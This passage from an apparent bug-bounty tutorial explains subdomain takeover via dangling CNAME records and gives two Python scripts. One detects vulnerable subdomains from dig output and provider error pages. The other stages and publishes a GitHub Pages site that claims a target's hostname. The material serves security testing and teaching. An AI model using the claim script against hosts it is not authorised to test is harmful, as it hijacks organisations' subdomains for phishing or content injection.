Another extremely popular vulnerability is subdomain takeover. Though it has died down significantly, it is still very common in the wild. If you are unfamiliar with this type of vulnerability, one definition you will find through Google is: “Subdomain takeover attacks are a class of security issues where an attacker is able to seize control of an organization’s subdomain via cloud services like AWS or Azure”.
A subdomain takeover occurs when a subdomain’s DNS record (typically a CNAME) points at a hostname that no longer exists: an expired domain, or a site, bucket or app on a hosting provider that has since been deleted while the DNS record was left behind. If an attacker registers that non-existent domain, or claims the deleted resource on the provider, the target subdomain now resolves to something the attacker controls, and everything served under the target’s hostname comes from the attacker. What makes this vulnerability so interesting is that an organization can be safe one minute and a single DNS change, or the deletion of the resource on the other end, can make it vulnerable the next.
If you’re planning on hunting for this vulnerability, you are definitely going to be referencing the subdomain takeover GitHub page, which contains a list of hosting providers (“engines”) together with examples and walkthroughs for exploiting each one. The page tracks which providers can be exploited, and clicking the issue number next to a provider opens a walkthrough of exploiting that particular engine. Because every provider has its own way of claiming a hostname, you will need to learn the process for whichever engine your target’s dangling record points at.
One of the easiest ways to spot a subdomain takeover is by the error message the dangling subdomain returns. When the record points at a deleted GitHub Pages site, for example, GitHub answers with a 404 page that reads “There isn't a GitHub Pages site here.” Each provider has its own telltale message, and the subdomain takeover GitHub page lists them.
Now that we have an indicator that the site is vulnerable, we need to find the GitHub Pages hostname the vulnerable subdomain points to. We need this information so we can claim that name through GitHub.
A “dig” command against the vulnerable subdomain (for example dig CNAME followed by the target subdomain) returns its DNS records, and the CNAME record shows that the subdomain points to the GitHub Pages hostname “ghostlulzvulntakeover.github.io”. If we can claim that name on GitHub, we win. Note that dig reports what the target’s DNS says; the record can still be there long after the GitHub side has been deleted, which is exactly the dangling state we are looking for. To figure out the process of setting up a Pages site on GitHub you can Google it or follow the tutorial on the subdomain takeover GitHub page.
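The dig-and-error-message check above can be automated. The script below is an added example, not code from the book or from any project: it parses dig output for the CNAME chain, then reports either a target that no longer resolves (NXDOMAIN, so its base domain may be registrable) or a provider that serves its “no such site” page. The dig output and HTTP bodies inside it are constructed samples; vuln.example.com, the expired vendor hostname and the S3 fingerprint are assumptions, while the GitHub Pages target and error text are the ones described in this section.

```python
"""Triage a subdomain for takeover from its DNS answer and HTTP response.

Added example, not the book's code. It checks the two signs the text
describes: a CNAME target that no longer exists (NXDOMAIN) and a CNAME target
on a hosting provider that answers with its "no such site" page. The dig
output and HTTP bodies below are constructed samples; vuln.example.com and
the expired vendor hostname are placeholders.
"""
import re
import subprocess
import urllib.error
import urllib.request
from dataclasses import dataclass

# CNAME-target suffix -> substring of the provider's error page.
FINGERPRINTS = {
    ".github.io": "There isn't a GitHub Pages site here",   # from the text
    ".s3.amazonaws.com": "NoSuchBucket",  # assumption: S3's missing-bucket error
}


@dataclass
class DigResult:
    status: str    # NOERROR, NXDOMAIN, SERVFAIL, ...
    records: list  # (owner, type, rdata) tuples from the ANSWER section


def parse_dig(output: str) -> DigResult:
    """Pull the header status and ANSWER SECTION records out of dig's output."""
    m = re.search(r"status: (\w+)", output)
    status = m.group(1) if m else "UNKNOWN"
    records, in_answer = [], False
    for line in output.splitlines():
        if line.startswith(";; ANSWER SECTION"):
            in_answer = True
        elif line.startswith(";;"):          # any other section header ends the answer
            in_answer = False
        elif in_answer and line.strip():
            owner, _ttl, _cls, rtype, rdata = line.split()[:5]
            records.append((owner.rstrip("."), rtype, rdata.rstrip(".")))
    return DigResult(status, records)


def cname_target(host: str, host_dig: str):
    """Follow the CNAME chain in dig's answer; None when host has no CNAME."""
    chain = {o: r for o, t, r in parse_dig(host_dig).records if t == "CNAME"}
    cur, seen = host, set()
    while cur in chain and cur not in seen:
        seen.add(cur)
        cur = chain[cur]
    return None if cur == host else cur


def registrable_domain(name: str) -> str:
    """Last two labels; a real tool should consult the Public Suffix List."""
    return ".".join(name.split(".")[-2:])


def assess(host: str, host_dig: str, target_dig: str, body: str):
    """Classify host from dig output for host and its target plus the HTTP body."""
    target = cname_target(host, host_dig)
    if target is None:
        return ("no-cname", None)
    if parse_dig(target_dig).status == "NXDOMAIN":
        # Nothing answers for the target: check (whois) whether its base domain
        # is unregistered. This is the "register the non-existing domain" case.
        return ("dangling-nxdomain", registrable_domain(target))
    for suffix, marker in FINGERPRINTS.items():
        if target.endswith(suffix) and marker in body:
            # The provider serves its placeholder page: claim the name there.
            return ("dangling-provider", suffix.lstrip("."))
    return ("ok", target)


def dig(name: str, rtype: str = "A") -> str:
    """Run dig for a live check (needs dig installed; not used by the samples)."""
    return subprocess.run(["dig", rtype, name], capture_output=True,
                          text=True, check=False).stdout


def fetch_body(host: str) -> str:
    """GET http://host/ and return the body, error pages included."""
    try:
        with urllib.request.urlopen(f"http://{host}/", timeout=10) as r:
            return r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.read().decode(errors="replace")
    except urllib.error.URLError:
        return ""


def assess_live(host: str):
    host_dig = dig(host, "CNAME")
    target = cname_target(host, host_dig)
    if target is None:
        return ("no-cname", None)
    return assess(host, host_dig, dig(target, "A"), fetch_body(host))


# Constructed dig output: the text's CNAME target behind a placeholder subdomain.
HOST_DIG = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; QUESTION SECTION:
;vuln.example.com.\t\tIN\tCNAME

;; ANSWER SECTION:
vuln.example.com.\t300\tIN\tCNAME\tghostlulzvulntakeover.github.io.

;; Query time: 12 msec
"""
GITHUB_TARGET_DIG = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243
;; ANSWER SECTION:
ghostlulzvulntakeover.github.io.\t3600\tIN\tA\t185.199.108.153
"""
GITHUB_404_BODY = "<h1>404</h1><p>There isn't a GitHub Pages site here.</p>"
# Second constructed case: the CNAME points at a vendor domain that has expired.
EXPIRED_HOST_DIG = HOST_DIG.replace("ghostlulzvulntakeover.github.io.", "cdn.oldvendor-example.net.")
EXPIRED_TARGET_DIG = ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 4244\n"

if __name__ == "__main__":
    print(assess("vuln.example.com", HOST_DIG, GITHUB_TARGET_DIG, GITHUB_404_BODY))
    print(assess("vuln.example.com", EXPIRED_HOST_DIG, EXPIRED_TARGET_DIG, ""))
```

The verdict is only a lead: a dangling-provider result still has to be confirmed by claiming the name, and a dangling-nxdomain result needs a whois check on the reported domain before it means anything.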
Now that we know the steps to set up a GitHub Pages site, we just need to do it. First, create a GitHub repo with the same name as the CNAME record (ghostlulzvulntakeover.github.io).
After that, create an “index.html” file in the repo; this is the page GitHub will serve.
The next step is to enable GitHub Pages for the repo and set its publishing source to the main branch (Settings > Pages).
Finally, set the repo’s custom domain to the target subdomain you are going after. This is the step that matters: GitHub serves your repo’s content for requests that arrive for that hostname, and the target’s CNAME is what delivers those requests to GitHub Pages.
That’s it! Once the setting takes effect, visiting the target subdomain should show the page you set up.
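The same claim can be staged from the command line. The following is an added example, not the book’s own steps or any GitHub tooling: it writes index.html and a CNAME file (GitHub keeps the custom domain entered under Settings > Pages in a file of that name at the root of the published branch) and lists the git and gh commands that create the repo, push it and turn on Pages. The owner, repository, hostname and the “proof of concept” marker are placeholders; publish() assumes git 2.28+ and an authenticated gh CLI and is not run here.

```python
"""Stage a GitHub Pages site that claims a target hostname.

Added example, not the book's code. GitHub stores the custom domain from
Settings > Pages as a file named CNAME in the root of the published branch,
so committing that file next to index.html is equivalent to the UI steps in
the text. Owner, repository and hostname below are placeholders; publish()
needs git (2.28+ for `init -b`) and an authenticated gh CLI.
"""
import subprocess
import tempfile
from pathlib import Path

# Harmless placeholder page; the marker string is what a later check looks for.
INDEX_HTML = """<!doctype html>
<html><head><title>PoC</title></head>
<body><h1>Subdomain takeover proof of concept</h1>
<p>Served from a GitHub Pages repository the tester controls.</p>
</body></html>
"""


def normalize_host(host: str) -> str:
    """GitHub expects one bare hostname: no scheme, no path, no trailing dot."""
    host = host.strip().lower()
    host = host.split("://", 1)[-1].split("/", 1)[0]
    return host.rstrip(".")


def stage_site(workdir, target_host: str) -> Path:
    """Write index.html plus the CNAME file; returns the staged directory."""
    root = Path(workdir) if workdir else Path(tempfile.mkdtemp(prefix="pages-poc-"))
    root.mkdir(parents=True, exist_ok=True)
    (root / "index.html").write_text(INDEX_HTML)
    (root / "CNAME").write_text(normalize_host(target_host) + "\n")
    return root


def publish_commands(owner: str, repo: str, branch: str = "main") -> list:
    """Commands that create the repo, push the site and enable Pages from branch."""
    return [
        ["git", "init", "-b", branch],
        ["git", "add", "index.html", "CNAME"],
        ["git", "commit", "-m", "subdomain takeover PoC"],
        ["gh", "repo", "create", f"{owner}/{repo}", "--public", "--source=.", "--push"],
        # REST "create a GitHub Pages site": publishes the branch root, which is
        # the UI's publishing-source step. GitHub reads the custom domain from CNAME.
        ["gh", "api", "--method", "POST", f"/repos/{owner}/{repo}/pages",
         "-f", f"source[branch]={branch}", "-f", "source[path]=/"],
    ]


def publish(workdir, owner: str, repo: str, branch: str = "main") -> None:
    """Run the commands above inside the staged directory (network + auth needed)."""
    for cmd in publish_commands(owner, repo, branch):
        subprocess.run(cmd, cwd=workdir, check=True)


def is_takeover_live(body: str) -> bool:
    """True when a response fetched from the target subdomain is our PoC page."""
    return "Subdomain takeover proof of concept" in body


if __name__ == "__main__":
    # Placeholders: the text's repo name under a placeholder owner and target host.
    root = stage_site(None, "vuln.example.com")
    print(root, (root / "CNAME").read_text().strip())
    for cmd in publish_commands("ghostlulz", "ghostlulzvulntakeover.github.io"):
        print(" ".join(cmd))
```

Staging and publishing are split on purpose: the files can be inspected before anything is pushed, and the command list makes it obvious that the only network-facing actions are the gh calls.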
We win! We have successfully exploited the subdomain takeover vulnerability and got our page to appear on the target’s subdomain. Note that this is the process for GitHub; if your target’s record points at a different provider you will have to follow the steps for that provider. Luckily for us, all of this is documented on the subdomain takeover GitHub wiki.
A few years ago subdomain takeover was all over the place, and while it has started to die down recently, you will still find plenty of organizations vulnerable to this type of attack. It is extremely easy to pull off and it lets the attacker completely take over the target subdomain. If you’re looking for an easy high-severity finding, this is it.